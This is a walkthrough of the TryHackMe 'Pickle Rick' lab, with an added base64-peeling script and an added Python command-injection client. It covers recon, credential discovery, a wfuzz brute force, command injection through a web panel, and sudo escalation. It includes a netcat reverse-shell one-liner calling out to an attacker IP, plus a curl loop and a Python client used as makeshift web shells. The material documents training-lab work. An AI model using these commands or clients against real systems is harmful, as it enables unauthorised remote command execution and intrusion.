TryHackMe Walkthrough - picklerick

  • Target machine: picklerick.

  • Working directory: /home/kali/picklerick

  • Time spent on it:

Template changelog

  • Version 1.0 - Sep. 2022: created the base template for HackTheBox

  • Version 1.1 - Oct. 2022: added the nmap scans and the basic commands

  • Version 1.2 - Nov. 2022: added redirections to silence error output, and a domain variable to be compatible with TryHackMe

  • Version 1.3 - Nov. 2022: added the UDP scan and the export to searchsploit

  • Version 1.4 - Dec. 2022: changed the searchsploit export to save time, and added the vuln scripts to the full scan for confirmation.

Phase 1: Reconnaissance

┌──(kali㉿kali)-[~]
└─$ 
name="picklerick"  
repository="/home/kali/$name"
ip="10.10.142.156"
domain='thm'
# Enter the working directory, creating it on the first run
cd "$repository" 2>/dev/null || { mkdir -p "$repository" && cd "$repository"; }
# Add the host entry once, so $name and $name.$domain resolve in the tools below
grep -q "$ip $name ${name}.${domain}" /etc/hosts || echo "$ip $name ${name}.${domain}" | sudo tee -a /etc/hosts


# Quick TCP scan of the top 1000 ports, exported as XML for searchsploit
nmap -Pn -A -T5 --top-ports 1000 -oN $repository/txt -oX $repository/sploitable $ip
searchsploit --nmap $repository/sploitable
# Full TCP range with the vuln scripts, then the (slow) full UDP range
nmap -Pn -A -T5 -p - --script vuln -oN $repository/full -oX $repository/fullsploitable $ip
sudo nmap -Pn -A -T5 -sU -p - -oN $repository/udp -oX $repository/udploitable $ip
searchsploit --nmap $repository/udploitable


Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-21 06:31 EST
Warning: 10.10.142.156 giving up on port because retransmission cap hit (2).
Nmap scan report for picklerick (10.10.142.156)
Host is up (0.084s latency).
Not shown: 988 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5b8679ff99744b9052e97f4777291ba5 (RSA)
|   256 2546a139ab30859175c94aafa4710438 (ECDSA)
|_  256 9360abc7cae19e6816a8c6dfe052da10 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 331.05 seconds

So not much apart from a web site and SSH. Well... Let's look at the source of the default page and run a gobuster:

<!--
  Note to self, remember username!

  Username: R1ckRul3s
-->
┌──(kali㉿kali)-[~/picklerick]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$name
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://picklerick
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/21 06:36:29 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 309] [--> http://picklerick/assets/]

The directory-mode gobuster run doesn't find much; let's try a file wordlist on top:

┌──(kali㉿kali)-[~/picklerick]
└─$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -u http://$name
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://picklerick
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/05 17:02:56 Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 882]
/index.html           (Status: 200) [Size: 1062]
/.htaccess            (Status: 403) [Size: 294]
/robots.txt           (Status: 200) [Size: 17]
/.                    (Status: 200) [Size: 1062]
/.html                (Status: 403) [Size: 290]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/.php                 (Status: 403) [Size: 289]

That finds a bit more: for instance a /robots.txt, which may hold useful information, and /login.php. Let's try a gentle little brute force against the login page:

┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/robots.txt                                                                                         
Wubbalubbadubdub


┌──(kali㉿kali)-[~/picklerick]
└─$ wfuzz -c -w /usr/share/wordlists/rockyou.txt -d "username=R1ckRul3s&password=FUZZ&sub=Login" --hl 27 http://$name/login.php

Well, that one is useless, it was nice to hope! But what if we try Wubbalubbadubdub, found in the robots.txt file?

Phase 2: Analysis

┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/login.php -d "username=R1ckRul3s&password=Wubbalubbadubdub&sub=Login" -v 
*   Trying 10.10.142.156:80...
* Connected to picklerick (10.10.142.156) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
> Content-Length: 54
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Thu, 05 Jan 2023 16:27:24 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: PHPSESSID=k8ei2hp87vf8tfmte53m1fvp81; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Location: /portal.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host picklerick left intact
┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/login.php -d "username=R1ckRul3s&password=Wubbalubbadubdub&sub=Login" -vL
*   Trying 10.10.142.156:80...
* Connected to picklerick (10.10.142.156) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
> Content-Length: 54
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Thu, 05 Jan 2023 16:49:35 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: PHPSESSID=1q4qj0l14567f4fvr4m6qhkd80; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Location: /portal.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host picklerick left intact
* Issue another request to this URL: 'http://picklerick/portal.php'
* Switch from POST to GET
* Found bundle for host: 0x55caf1b26d90 [serially]
* Can not multiplex, even if we wanted to
* Re-using existing connection #0 with host picklerick
* Connected to picklerick (10.10.142.156) port 80 (#0)
> GET /portal.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Thu, 05 Jan 2023 16:49:35 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: PHPSESSID=itgi6vtgiv73pj34hi7ulq14m3; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Location: /login.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host picklerick left intact
* Issue another request to this URL: 'http://picklerick/login.php'
* Found bundle for host: 0x55caf1b26d90 [serially]
* Can not multiplex, even if we wanted to
* Re-using existing connection #0 with host picklerick
* Connected to picklerick (10.10.142.156) port 80 (#0)
> GET /login.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 05 Jan 2023 16:49:35 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: PHPSESSID=lgmms9kglml9odjjvicvrcamp4; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Vary: Accept-Encoding
< Content-Length: 882
< Content-Type: text/html; charset=UTF-8
< 
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Rick is sup4r cool</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="assets/bootstrap.min.css">
  <script src="assets/jquery.min.js"></script>
  <script src="assets/bootstrap.min.js"></script>
</head>
<body>

  <div class="container">
  </br><img width="300" src="assets/portal.jpg"><h3>Portal Login Page</h3></br>
    <form name="input" action="" method="post">
      <label for="username">Username:</label><input type="text" class="form-control" value="" id="username" name="username" />
      <label for="password">Password:</label><input type="password" class="form-control" value="" id="password" name="password" />

      
    </br><input type="submit" value="Login" class="btn btn-success" name="sub"/>
    </form>
  </div>

</body>
</html>
* Connection #0 to host picklerick left intact

┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/login.php -d "username=R1ckRul3s&password=Wubbalubbadubdub&sub=Login" -H "Cookie: PHPSESSID=lgmms9kglml9odjjvicvrcamp4" --proxy http://127.0.0.1:8080 -vL
*   Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> POST http://picklerick/login.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Cookie: PHPSESSID=lgmms9kglml9odjjvicvrcamp4
> Content-Length: 54
> Content-Type: application/x-www-form-urlencoded
> 

* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Thu, 05 Jan 2023 16:50:32 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Location: /portal.php
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
< 
* Closing connection 0
* Issue another request to this URL: 'http://picklerick/portal.php'
* Switch from POST to GET
* Hostname 127.0.0.1 was found in DNS cache
*   Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#1)
> GET http://picklerick/portal.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Cookie: PHPSESSID=lgmms9kglml9odjjvicvrcamp4
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 05 Jan 2023 16:50:32 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Vary: Accept-Encoding
< Content-Length: 1294
< Connection: close
< Content-Type: text/html; charset=UTF-8
< 
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Rick is sup4r cool</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="assets/bootstrap.min.css">
  <script src="assets/jquery.min.js"></script>
  <script src="assets/bootstrap.min.js"></script>
</head>
<body>
  <nav class="navbar navbar-inverse">
    <div class="container">
      <div class="navbar-header">
        <a class="navbar-brand" href="#">Rick Portal</a>
      </div>
      <ul class="nav navbar-nav">
        <li class="active"><a href="#">Commands</a></li>
        <li><a href="/denied.php">Potions</a></li>
        <li><a href="/denied.php">Creatures</a></li>
        <li><a href="/denied.php">Potions</a></li>
        <li><a href="/denied.php">Beth Clone Notes</a></li>
      </ul>
    </div>
  </nav>

  <div class="container">
    <form name="input" action="" method="post">
      <h3>Command Panel</h3></br>
      <input type="text" class="form-control" name="command" placeholder="Commands"/></br>
      <input type="submit" value="Execute" class="btn btn-success" name="sub"/>
    </form>
        <!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
  </div>
</body>
</html>
* Closing connection 1

Info: I kept the curl form because I find it rather interesting. In the first request you can see the server hands us a cookie and accepts our credentials (302 to /portal.php), but curl does not follow the redirect. With -L it should follow the redirect, but that fails too, because the cookie was never set on the follow-up request: portal.php sees no session, bounces us back to /login.php, which in turn hands out yet another PHPSESSID. Hence the extra -H (curl's cookie jar, -c/-b, would do the same job). I kept the --proxy so the request also shows up in Burp.

Another commented-out field, which looks like base64. Let's take a closer look:

┌──(kali㉿kali)-[~/picklerick]
└─$ echo "Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==" | base64 -d 2> /dev/null 
VmpGU1NtVkdTWGxTYkdScFUwWktjRlZyVmt0VE1WWnhVMjA1VG1KSGVIbFhhMXBoVlZaV1ZVMUVhejA=

That still looks like base64... Let's try again.

┌──(kali㉿kali)-[~/picklerick]
└─$ base64="Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0=="; while [ -n "$base64" ]; do base64=$(echo "$base64" | base64 -d 2>/dev/null); echo "$base64"; done
VmpGU1NtVkdTWGxTYkdScFUwWktjRlZyVmt0VE1WWnhVMjA1VG1KSGVIbFhhMXBoVlZaV1ZVMUVhejA=
VjFSSmVGSXlSbGRpU0ZKcFVrVktTMVZxU205TmJHeHlXa1phVVZWVU1Eaz0
V1RJeFIyRldiSFJpUkVKS1VqSm9NbGxyWkZaUVVUMDk=
WTIxR2FWbHRiREJKUjJoMllrZFZQUT09
Y21GaVltbDBJR2h2YkdVPQ==
cmFiYml0IGhvbGU=
rabbit hole
��ۊ

That's my very first rabbit hole (i.e. a false lead) actually labelled as such :o
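The shell loop above gets there, but it blindly decodes one layer too far and prints binary junk, and the very first decode already needed 2>/dev/null: the comment carries one '=' too many (109 characters) while the third layer carries none (59 characters). Here is an added Python version (example code written for this edit, not code from the room or the author): it normalises the padding, stops as soon as a layer is no longer base64 alphabet or no longer printable text, and reports how many layers it removed. PORTAL_COMMENT is the comment from portal.php shown above; the layer cap is an arbitrary guard.

```python
import base64
import binascii
import re
import string

B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+=*$")
PRINTABLE = frozenset(string.printable)

# The HTML comment lifted from portal.php on this page.
PORTAL_COMMENT = (
    "Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcx"
    "S1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0=="
)


def decode_layer(text):
    """Decode one base64 layer, or return None when `text` is not base64.

    Padding is normalised first: the portal comment carries one '=' too many
    and one intermediate layer carries none, and both trip a strict decoder.
    """
    text = text.strip()
    if not B64_ALPHABET.match(text):
        return None                      # e.g. 'rabbit hole': a space is not base64
    body = text.rstrip("=")
    body += "=" * (-len(body) % 4)       # re-pad to a multiple of 4
    try:
        raw = base64.b64decode(body)
    except (binascii.Error, ValueError):
        return None
    try:
        decoded = raw.decode("ascii")
    except UnicodeDecodeError:
        return None                      # binary junk: one layer too far
    if not decoded or any(ch not in PRINTABLE for ch in decoded):
        return None
    return decoded


def peel_base64(blob, max_layers=32):
    """Strip nested base64 layers; returns (plaintext, layers_removed).

    max_layers is an arbitrary guard against input that keeps decoding.
    """
    current = blob.strip()
    for layers in range(max_layers):
        nxt = decode_layer(current)
        if nxt is None:
            return current, layers
        current = nxt
    return current, max_layers


if __name__ == "__main__":
    text, depth = peel_base64(PORTAL_COMMENT)
    print(f"{depth} layers removed: {text!r}")
```

Run as is, it peels the seven layers of the portal comment and stops cleanly on "rabbit hole" instead of printing garbage, because the space in the result fails the alphabet check before any decode is attempted.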

Phase 3: user, sort of

Back to the web site: it offers a Command Panel. Could that be a way to execute code?

┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/portal.php -d "command=id&sub=Execute" -H "Cookie: PHPSESSID=cd1fi5aogudpk8qm0lp6hq16i6" --proxy http://127.0.0.1:8080
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Rick is sup4r cool</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="assets/bootstrap.min.css">
  <script src="assets/jquery.min.js"></script>
  <script src="assets/bootstrap.min.js"></script>
</head>
<body>
  <nav class="navbar navbar-inverse">
    <div class="container">
      <div class="navbar-header">
        <a class="navbar-brand" href="#">Rick Portal</a>
      </div>
      <ul class="nav navbar-nav">
        <li class="active"><a href="#">Commands</a></li>
        <li><a href="/denied.php">Potions</a></li>
        <li><a href="/denied.php">Creatures</a></li>
        <li><a href="/denied.php">Potions</a></li>
        <li><a href="/denied.php">Beth Clone Notes</a></li>
      </ul>
    </div>
  </nav>

  <div class="container">
    <form name="input" action="" method="post">
      <h3>Command Panel</h3></br>
      <input type="text" class="form-control" name="command" placeholder="Commands"/></br>
      <input type="submit" value="Execute" class="btn btn-success" name="sub"/>
    </form>
    </br><pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>    <!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
  </div>
</body>
</html>

┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/portal.php -d "command=ls+-l&sub=Execute" -H "Cookie: PHPSESSID=cd1fi5aogudpk8qm0lp6hq16i6" --proxy http://127.0.0.1:8080   
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Rick is sup4r cool</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="assets/bootstrap.min.css">
  <script src="assets/jquery.min.js"></script>
  <script src="assets/bootstrap.min.js"></script>
</head>
<body>
  <nav class="navbar navbar-inverse">
    <div class="container">
      <div class="navbar-header">
        <a class="navbar-brand" href="#">Rick Portal</a>
      </div>
      <ul class="nav navbar-nav">
        <li class="active"><a href="#">Commands</a></li>
        <li><a href="/denied.php">Potions</a></li>
        <li><a href="/denied.php">Creatures</a></li>
        <li><a href="/denied.php">Potions</a></li>
        <li><a href="/denied.php">Beth Clone Notes</a></li>
      </ul>
    </div>
  </nav>

  <div class="container">
    <form name="input" action="" method="post">
      <h3>Command Panel</h3></br>
      <input type="text" class="form-control" name="command" placeholder="Commands"/></br>
      <input type="submit" value="Execute" class="btn btn-success" name="sub"/>
    </form>
    </br><pre>total 32
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4096 Feb 10  2019 assets
-rwxr-xr-x 1 ubuntu ubuntu   54 Feb 10  2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1105 Feb 10  2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1062 Feb 10  2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1438 Feb 10  2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2044 Feb 10  2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 robots.txt
</pre>    <!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
  </div>
</body>
</html>

So there are several files: Sup3rS3cretPickl3Ingred.txt and clue.txt are new to us. Let's have a look. N.B.: clue.txt is a hint; don't open it if you want to play it realistic!

┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/Sup3rS3cretPickl3Ingred.txt --proxy http://127.0.0.1:8080                                                             

mr. meeseek hair

We have our first ingredient. Moving on: can we get ourselves a nicer reverse shell? For that, off to revshell and let's test:

┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/portal.php -d "command=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.8.23.82%203333%20%3E%2Ftmp%2Ff&sub=Execute" -H "Cookie: PHPSESSID=cd1fi5aogudpk8qm0lp6hq16i6" --proxy http://127.0.0.1:8080
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Rick is sup4r cool</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="assets/bootstrap.min.css">
  <script src="assets/jquery.min.js"></script>
  <script src="assets/bootstrap.min.js"></script>
</head>
<body>
  <nav class="navbar navbar-inverse">
    <div class="container">
      <div class="navbar-header">
        <a class="navbar-brand" href="#">Rick Portal</a>
      </div>
      <ul class="nav navbar-nav">
        <li class="active"><a href="#">Commands</a></li>
        <li><a href="/denied.php">Potions</a></li>
        <li><a href="/denied.php">Creatures</a></li>
        <li><a href="/denied.php">Potions</a></li>
        <li><a href="/denied.php">Beth Clone Notes</a></li>
      </ul>
    </div>
  </nav>

  <div class="container">
    <form name="input" action="" method="post">
      <h3>Command Panel</h3></br>
      <input type="text" class="form-control" name="command" placeholder="Commands"/></br>
      <input type="submit" value="Execute" class="btn btn-success" name="sub"/>
    </form>
    </br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>    <!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
  </div>
</body>
</html>

Well, it won't be that one. I tried a good dozen of them, nothing doing, the reverse shells don't get through... We'll have to make do with the command injection we already have. I quickly got fed up with changing the command inside the curl request, and I wanted to keep this process, so I built myself my own little "reverse shell".

┌──(kali㉿kali)-[~/picklerick]
└─$ while true; do echo -n "Command to run? "; read cmd; curl -s http://picklerick/portal.php --data-urlencode "command=$cmd" -d "sub=Execute" -H "Cookie: PHPSESSID=cd1fi5aogudpk8qm0lp6hq16i6" --proxy http://127.0.0.1:8080; done

Command to run? ls /home
<pre>
rick
ubuntu
</pre>

Command to run? ls /home/rick
<pre>
second ingredients
</pre>

Command to run? cat /home/rick/second\\ ingredients

</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>

Command to run? less /home/rick/second\\ ingredients
<pre>
1 jerry tear
</pre>
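The manual loop above works but sends the command un-encoded and needs the PHPSESSID pasted in by hand. Below is an added Python client for the same injection (example code written for this edit, not the room's or the author's): it keeps the session in a cookie jar, which is exactly what the plain curl -L attempt in Phase 2 lacked, URL-encodes the command, shell-quotes paths such as /home/rick/second ingredients, and classifies the portal's answer as output, refused ("Command disabled") or empty. Files are read with less, since cat is refused (note that the revshell one-liner tried above also contains cat). The host name, credentials and the "Command disabled" marker come from this page; the two sample responses embedded for the offline check are trimmed copies of responses shown above.

```python
import http.cookiejar
import re
import shlex
import urllib.parse
import urllib.request

# Values taken from the walkthrough: host entry added to /etc/hosts during recon,
# username from the index.html comment, password from robots.txt.
BASE_URL = "http://picklerick"
USERNAME = "R1ckRul3s"
PASSWORD = "Wubbalubbadubdub"
DISABLED_MARKER = "Command disabled"   # text portal.php returns for a refused command


def make_session():
    """Opener with a cookie jar: the PHPSESSID issued by login.php is replayed on
    portal.php automatically. Without it the 302 to /portal.php is followed with
    no session and portal.php bounces straight back to /login.php."""
    jar = http.cookiejar.CookieJar()
    return urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))


def login(opener, base_url=BASE_URL):
    """POST the credentials; urllib follows the 302 chain, so landing on
    /portal.php (rather than back on /login.php) means the session is valid."""
    body = urllib.parse.urlencode(
        {"username": USERNAME, "password": PASSWORD, "sub": "Login"}).encode()
    with opener.open(f"{base_url}/login.php", data=body) as resp:
        return resp.geturl().endswith("/portal.php")


def parse_portal(html):
    """Classify a portal.php response.
    ('output', text)  - the command ran; text is what the <pre> block carried
    ('disabled', '')  - the portal refused the command
    ('none', '')      - no <pre> at all (the command produced no stdout)"""
    if DISABLED_MARKER in html:
        return "disabled", ""
    m = re.search(r"<pre>(.*?)</pre>", html, re.S)
    if m:
        return "output", m.group(1).strip("\n")
    return "none", ""


def read_file_command(path):
    """Build the command used to read a file. cat is refused by the portal and
    less is not; shlex.quote handles paths with spaces like 'second ingredients'."""
    return f"less {shlex.quote(path)}"


def run_command(opener, cmd, base_url=BASE_URL):
    """Send one command through the Command Panel, URL-encoded (unlike a raw
    curl -d, so ;, &, + and % survive), and classify the answer."""
    body = urllib.parse.urlencode({"command": cmd, "sub": "Execute"}).encode()
    with opener.open(f"{base_url}/portal.php", data=body) as resp:
        return parse_portal(resp.read().decode("utf-8", "replace"))


# Constructed samples: trimmed copies of two responses shown earlier on this page.
SAMPLE_OUTPUT_PAGE = """<form name="input" action="" method="post"></form>
    </br><pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>    <!-- comment -->"""
SAMPLE_DISABLED_PAGE = ("</br><p><u>Command disabled</u> to make it hard for future "
                        "<b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>")


def main():
    opener = make_session()
    if not login(opener):
        raise SystemExit("login failed: did not land on /portal.php")
    while True:
        cmd = input("Command to run? ")
        if cmd in ("exit", "quit"):
            break
        status, text = run_command(opener, cmd)
        print(text if status == "output" else f"[{status}]")


if __name__ == "__main__":
    main()
```

Against the live box, run it with python3 (it assumes picklerick resolves through the /etc/hosts line from Phase 1); the interactive loop prints [disabled] whenever the portal refuses a command, and the three ingredient files are read with run_command(opener, read_file_command(path)).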

Phase 4: root, sort of

OK, so we managed to get the 2nd one. My detective's nose tells me the third must be in the root directory. As often in CTFs, there is one in the user's home and one in root's. Let's see whether we can become root:

Command to run? sudo -l 
<pre>
Matching Defaults entries for www-data on ip-10-10-142-156.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-142-156.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
</pre>
Command to run? sudo ls /root
<pre>
3rd.txt
snap
</pre>
Command to run? sudo less /root/3rd.txt
<pre>
3rd ingredients: fleeb juice
</pre>

Well, our makeshift shell did the job, we have all 3 ingredients!

Questions:

What is the first ingredient Rick needs?

mr. meeseek hair

What's the second ingredient Rick needs?

1 jerry tear

What's the final ingredient Rick needs?

fleeb juice

Recap

This was a challenge I had started a while ago without really getting into it. I picked it up again because I had a bit of time; it is very pleasant. Note that you need several enumeration approaches, or else ask gobuster to append extensions (.php, .txt... that adds up).

I stayed stuck far too long on the reverse shell part, it even frustrated me quite a bit. Security-wise, www-data with sudo NOPASSWD? Seriously? Apart from that black mark, the rest is really pleasant and realistic. I liked the rabbit hole!